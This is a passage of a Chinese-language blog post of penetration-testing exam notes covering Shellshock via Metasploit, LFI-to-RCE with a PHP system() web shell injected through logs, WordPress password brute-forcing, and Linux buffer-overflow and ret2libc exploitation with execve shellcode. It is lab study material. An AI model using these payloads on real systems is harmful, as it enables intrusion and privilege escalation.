<p>  pass the ticket技巧<br>  <a target="_blank" rel="noopener" href="https://wooyun.js.org/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.html">https://wooyun.js.org/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.html</a><br>  <figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs clean">    <br>## WEB<br>- SHELLSHOCK<br></code></pre></td></tr></table></figure><br>  &#x2F;usr&#x2F;lib&#x2F;cgi-bin&#x2F;</p>
<p>  dirb <a target="_blank" rel="noopener" href="http://172.19.19.24/">http://172.19.19.24</a><br>  dirb <a target="_blank" rel="noopener" href="http://172.19.19.24/cgi-bin">http://172.19.19.24/cgi-bin</a></p>
<p>  msfconsole<br>  search shellshock<br>  use exploit&#x2F;multi&#x2F;http&#x2F;apache_mod_cgi_bash_env_exec<br>  show options<br>  set RHOSTS 172.19.19.24<br>  set TARGETURI &#x2F;cgi-bin&#x2F;keygen<br>  exploit</p>
</li>
</ul>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc"><span class="hljs-bullet">- </span>Wordpress<br></code></pre></td></tr></table></figure>
<p>LFI to RCE<br>on 172.19.19.24:</p>
<p>cd &#x2F;var&#x2F;www</p>
<p>gedit include.php</p>
<?php
  include($_GET['file']);
?>

<p>chmod 775 -R &#x2F;var&#x2F;log&#x2F;apache2<br>tail &#x2F;var&#x2F;log&#x2F;apache2&#x2F;access.log</p>
<p>on Parrot:<br>    browser to <a target="_blank" rel="noopener" href="http://172.19.19.24/include.php?file=">http://172.19.19.24/include.php?file=</a></p>
<p>REF TO:</p>
<pre><code class="hljs">/var/log/auth.log # inject via SSH login username

/var/log/apache2/access.log # inject via browser User Agent header

/proc/self/environ # inject via browser cookie header
</code></pre>
<p>#inject example : <?php system($_GET[1]); ?></p>
<p>wpscan –url <a target="_blank" rel="noopener" href="http://172.19.19.24/wordpress">http://172.19.19.24/wordpress</a> -e</p>
<h1 id="e-g-wordpress-site-editor-1-1-1"><a href="#e-g-wordpress-site-editor-1-1-1" class="headerlink" title="e.g. wordpress site editor 1.1.1"></a>e.g. wordpress site editor 1.1.1</h1><h1 id="https-www-exploit-db-com-exploits-44340"><a href="#https-www-exploit-db-com-exploits-44340" class="headerlink" title="https://www.exploit-db.com/exploits/44340"></a><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/44340">https://www.exploit-db.com/exploits/44340</a></h1><p>wpscan –url <a target="_blank" rel="noopener" href="http://172.19.19.24/wordpress">http://172.19.19.24/wordpress</a> -U mike -P Wordlists&#x2F;Passwords.txt </p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs clean"><br>## binary<br><br></code></pre></td></tr></table></figure>
<p>PE: Windows 可執行文件<br>ELF: linux 可執行文件</p>
<p>定址空間 &#x3D; address * databus(8byte)<br>x86 &#x3D; 2^32 * 8byte &#x3D; 4Gbytes<br>x64 &#x3D; 2^64 * 8byte &#x3D; 18Ebytes</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">-</span> 程式編譯流程<br><span class="hljs-bullet">    -</span> C source code -&gt; compile -&gt; object code -&gt; link -&gt; executable<br><span class="hljs-code">    ![](https://i.imgur.com/XaArDi2.png)</span><br><span class="hljs-code">    </span><br><span class="hljs-code">- C語言程式記憶體配置</span><br><span class="hljs-code">![](https://i.imgur.com/iUZjmLj.png)</span><br><span class="hljs-code"></span><br><span class="hljs-bullet">-</span> Text 程式碼區段<br><span class="hljs-quote">&gt; 文字區段（text segment）也稱為程式碼區段（code segment），這裡存放的是可執行的 CPU 指令（instructions）。</span><br>這個區段通常位於 heap 或 stack 之後，避免因 heap 或 stack 溢位而覆寫 CPU 指令。<br>通常文字區段的資料是可以共用的，當多個同樣的程式在執行時，在記憶體中只需要存有一份就夠了，而這個文字區段通常都是唯讀的，避免程式本身誤改了自己的 CPU 指令。<br><span class="hljs-bullet">-</span> Data 初始化靜態變數<br><span class="hljs-quote">&gt; 初始化資料區段（initialized data segment）儲存的是一些已經初始化的靜態變數，例如有經過初始化的 C 語言的全域變數（global variables）以及靜態變數（static variables）都是儲存於此處。</span><br>這個區段的變數又可分為唯讀區域（read-only area）以及可讀寫區域（read-write area），可讀寫區域用於存放一般變數，其資料會隨著程式的執行而改變，而唯讀區域則是存放固定的常數。<br><span class="hljs-bullet">-</span> Bss 未初始化靜態變數<br><span class="hljs-quote">&gt; 未初始化資料區段（uninitialized data segment）又稱為 bss 區段（這個名稱的起源來自於古老的組譯器，代表 block started by symbol）是儲存尚未被初始化的靜態變數，而這些變數在程式執行之前會被系統初始化為 0 或是 null。</span><br><span class="hljs-bullet">-</span> Stack 區域變數<br><span class="hljs-quote">&gt; 堆疊區段（stack segment）用於儲存函數的區域變數，以及各種函數呼叫時需要儲存的資訊（例如函數返回的記憶體位址還有呼叫者函數的狀態等），每一次的函數呼叫就會在堆疊區段建立一個 stack frame，儲存該次呼叫的所有變數與狀態，這樣一來同一個函數重複被呼叫時就會有不同的 stack frame，不會互相干擾，遞迴函數就是透過這樣的機制來執行的。</span><br><span class="hljs-bullet">-</span> Heap 動態配置變數<br><span class="hljs-quote">&gt; heap 區段的記憶體空間用於儲存動態配置的變數，例如 C 語言的 malloc 以及 C++ 的 new 所建立的變數都是儲存於此。</span><br>堆疊區段一般的狀況會從高記憶體位址往低記憶體位址成長，而 heap 剛好從對面以相反的方向成長。<br><span class="hljs-bullet">-</span> System 命令列參數與環境變數<br><span class="hljs-quote">&gt; system 區段用於儲存一些命令列參數與環境變數，這部分會跟系統有關。</span><br><br><br><br>---<br><br><span class="hljs-bullet">-</span> 組合語言體系<br><span class="hljs-bullet">    -</span> AT&amp;T<br><span class="hljs-bullet">    -</span> Intel<br><span class="hljs-code">    </span><br><span class="hljs-code">- 函式庫呼叫</span><br><span class="hljs-code">    - windows visual studio(MSVCRT.dll)</span><br><span class="hljs-code">        - microsoft visual c runtime (msvcrt)</span><br><span class="hljs-code">            - 動態連結呼叫需要 如無須裝可轉散發套件</span><br><span class="hljs-code">    - linux gdb (gnu c libary) == libc</span><br><span class="hljs-code">        - 提供標準c函式</span><br><span class="hljs-code">        </span><br><span class="hljs-code">- ldd : 列出與檔案有關的分享函式庫</span><br><span class="hljs-code"></span><br><span class="hljs-bullet">-</span> file :分析程式類型<br>![](<span class="hljs-link">https://i.imgur.com/HQ42pHc.png</span>)<br><br><span class="hljs-bullet">-</span> strings : 輸出二進位文件可輸出字串<br>![](<span class="hljs-link">https://i.imgur.com/jOgXutT.png</span>)<br><br><span class="hljs-bullet">-</span> 查看程式調用多少 C API<br></code></pre></td></tr></table></figure>
<p>strings crackme0x00a | grep @@</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs less">!<span class="hljs-selector-attr">[]</span>(<span class="hljs-attribute">https</span>:<span class="hljs-comment">//i.imgur.com/9BDdUi4.png)</span><br><br>- 找出main函式<br></code></pre></td></tr></table></figure>
<p>readelf -a crackme0x00a |grep main</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs less">!<span class="hljs-selector-attr">[]</span>(<span class="hljs-attribute">https</span>:<span class="hljs-comment">//i.imgur.com/HYzXuBv.png)</span><br><br></code></pre></td></tr></table></figure>
<p>r2 crackme0x00a<br>pdf @ main</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs markdown">![](<span class="hljs-link">https://i.imgur.com/PhH6S1y.png</span>)<br><br><span class="hljs-bullet">-</span> gdb (disassemble main)<br><span class="hljs-bullet">-</span> objdump -d crackme0x00a<br><br><span class="hljs-bullet">-</span> 查看暫存器<br><span class="hljs-bullet">    -</span> gdb -q /bin/bash<br><span class="hljs-bullet">    -</span> break main<br><span class="hljs-bullet">    -</span> run<br><span class="hljs-bullet">    -</span> info registers<br><span class="hljs-code">    </span><br><span class="hljs-code">- ASLR</span><br></code></pre></td></tr></table></figure>
<h3 id="2為全開"><a href="#2為全開" class="headerlink" title="2為全開"></a>2為全開</h3><p>sysctl -a –parrten randomize</p>
<h3 id="關閉ASLR"><a href="#關閉ASLR" class="headerlink" title="關閉ASLR"></a>關閉ASLR</h3><p>sudo sysctl -w kernel.randomize_va_space&#x3D;0</p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><span class="hljs-type">![](https://i.imgur.com/bddP1HQ.png)</span><br><br><br><span class="hljs-meta">---</span><br><span class="hljs-meta"></span><br><span class="hljs-type">![](https://i.imgur.com/SVsCZ38.png)</span><br><br><span class="hljs-bullet">-</span> <span class="hljs-string">shellcode.c</span> <span class="hljs-string">(setuid</span> <span class="hljs-number">0</span><span class="hljs-string">)</span><br></code></pre></td></tr></table></figure>
<p>gcc -o shellcode -z execstack shellcode.c</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs less">!<span class="hljs-selector-attr">[]</span>(<span class="hljs-attribute">https</span>:<span class="hljs-comment">//i.imgur.com/EoAwz9U.png)</span><br><br><br>- stack.c<br></code></pre></td></tr></table></figure>
<p>gcc -o stack -z execstack -fno-stack-protector stack.c<br>sudo chown root:root stack<br>sudo chmod 4755 stack</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs css">```<br>gdb -<span class="hljs-selector-tag">q</span> stack<br>disassemble <span class="hljs-selector-tag">main</span><br><span class="hljs-selector-tag">b</span> *<span class="hljs-selector-tag">main</span> +<span class="hljs-number">55</span><br>run<br></code></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/la2huTp.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">pattern</span> <span class="hljs-keyword">create</span> <span class="hljs-number">500</span> badfile<br></code></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/p1yXJqR.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs clean">disassemble bof<br>run<br>c ### 溢出<br>pattern search<br></code></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/JX3aPUL.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight nsis"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs nsis"><span class="hljs-comment">### 變數傳值</span><br><span class="hljs-keyword">push</span> eax<br><span class="hljs-keyword">call</span> <span class="hljs-keyword">function</span> <br><span class="hljs-comment">### 字串</span><br><span class="hljs-keyword">push</span> <span class="hljs-number">0</span>x8048620<br><span class="hljs-keyword">call</span> <span class="hljs-keyword">function</span><br></code></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/HrmdwjK.png" srcset="/img/loading.gif" lazyload></p>
<ul>
<li><p>shellcode</p>
<figure class="highlight wren"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs wren">\<span class="hljs-variable">x31</span>\<span class="hljs-variable">xc0</span>\<span class="hljs-variable">x50</span>\<span class="hljs-variable">x68</span><span class="hljs-comment">//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80</span><br><br><span class="hljs-variable">shellcode</span>.<span class="hljs-property">py</span><br><br><span class="hljs-variable">print</span> <span class="hljs-string">&quot;A*42&quot;</span> <span class="hljs-operator">+</span> <span class="hljs-string">&quot;注入點&quot;</span> <span class="hljs-operator">+</span><span class="hljs-string">&quot;<span class="hljs-char escape_">\x90</span>&quot;</span> <span class="hljs-operator">*</span><span class="hljs-number">16</span> <span class="hljs-operator">+</span> <span class="hljs-string">&quot;<span class="hljs-char escape_">\x31</span>\xc0<span class="hljs-char escape_">\x50</span><span class="hljs-char escape_">\x68</span>//sh<span class="hljs-char escape_">\x68</span>/bin<span class="hljs-char escape_">\x89</span>\xe3<span class="hljs-char escape_">\x50</span><span class="hljs-char escape_">\x53</span><span class="hljs-char escape_">\x89</span>\xe1<span class="hljs-char escape_">\x99</span>\xb0\x0b\xcd<span class="hljs-char escape_">\x80</span>&quot;</span> <br><br><span class="hljs-variable">python</span> ./<span class="hljs-variable">shellcode</span>.<span class="hljs-property">py</span> <span class="hljs-operator">&gt;</span> <span class="hljs-variable">badfile</span><br><br></code></pre></td></tr></table></figure>
</li>
<li><p>return to libc</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cpp">gcc stack.c -fno-stack-protector -znoexecstack -o retlibc<br></code></pre></td></tr></table></figure></li>
</ul>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs clean">### NX enable<br><br>gdb -q retlibc<br>b main<br>r<br>## 程式必須run 載入記憶體<br>p <span class="hljs-keyword">system</span>  ### 尋找<span class="hljs-keyword">system</span>函數記憶體位置<br></code></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/of4OSK5.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">p <span class="hljs-keyword">exit</span><br></code></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/m3DdKYg.png" srcset="/img/loading.gif" lazyload></p>
<ul>
<li><p>計算函數偏移值</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">p system-<span class="hljs-keyword">exit</span><br></code></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/cRKoHpU.png" srcset="/img/loading.gif" lazyload></p>
</li>
<li><p>尋找&#x2F;bin&#x2F;sh 記憶體位置</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs clean">### peda<br>find /bin/sh<br>vmmap <br>### gdb<br>info proc mappings<br></code></pre></td></tr></table></figure>
<p><img src="https://i.imgur.com/xpjNnS7.png" srcset="/img/loading.gif" lazyload></p>
</li>
<li><p>print shellcode  </p>
<figure class="highlight csp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs csp">python -c &quot; <span class="hljs-string">&#x27;A&#x27;</span>*42 + <span class="hljs-string">&#x27;mem system&#x27;</span> + <span class="hljs-string">&#x27;BBBB or mem exit&#x27;</span> + <span class="hljs-string">&#x27;mem /bin/sh&#x27;</span> &quot;<br></code></pre></td></tr></table></figure>
</li>
<li><p>egg hunter (linux env shellcode)</p>
</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E7%AD%86%E8%A8%98/" class="category-chain-item">筆記</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/CPENT/">#CPENT</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>CPENT-考前準備</div>
      <div>http://example.com/2021/07/17/CPENT-考前準備/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Peter Luo</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>發布於</div>
          <div>2021年7月17日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>許可協議</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/07/25/GCP-%E5%AE%89%E8%A3%9D-Chrome-Remote-Desktop/" title="GCP 安裝 Chrome-Remote-Desktop">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">GCP 安裝 Chrome-Remote-Desktop</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目錄</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜尋</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">關鍵字</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      <p>Copyright © 2023 Giwawa . Powered by Hexo Fluid.</p>
      <div>
        <span id="timeDate">載入天數...</span>
        <span id="times">載入分秒...</span>
        <script>
        var now = new Date();
        function createtime(){
            var grt= new Date("07/25/2023 00:00:00");//此处修改你的建站时间或者网站上线时间
            now.setTime(now.getTime()+250);
            days = (now - grt ) / 1000 / 60 / 60 / 24;
            dnum = Math.floor(days);
            hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
            hnum = Math.floor(hours);
            if(String(hnum).length ==1 ){
                hnum = "0" + hnum;
            }
            minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
            mnum = Math.floor(minutes);
            if(String(mnum).length ==1 ){
                      mnum = "0" + mnum;
            }
            seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
            snum = Math.round(seconds);
            if(String(snum).length ==1 ){
                      snum = "0" + snum;
            }
            document.getElementById("timeDate").innerHTML = "🚀 運行 "+dnum+" 天";  //此次自定义显示内容
            document.getElementById("times").innerHTML = hnum + " 小時 " + mnum + " 分 " + snum + " 秒";
        }  //此次自定义显示内容
        setInterval("createtime()",250);
        </script>
      </div>

    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允許 JavaScript 運行的環境下瀏覽效果更佳</div>
  </noscript>
</body>
</html>
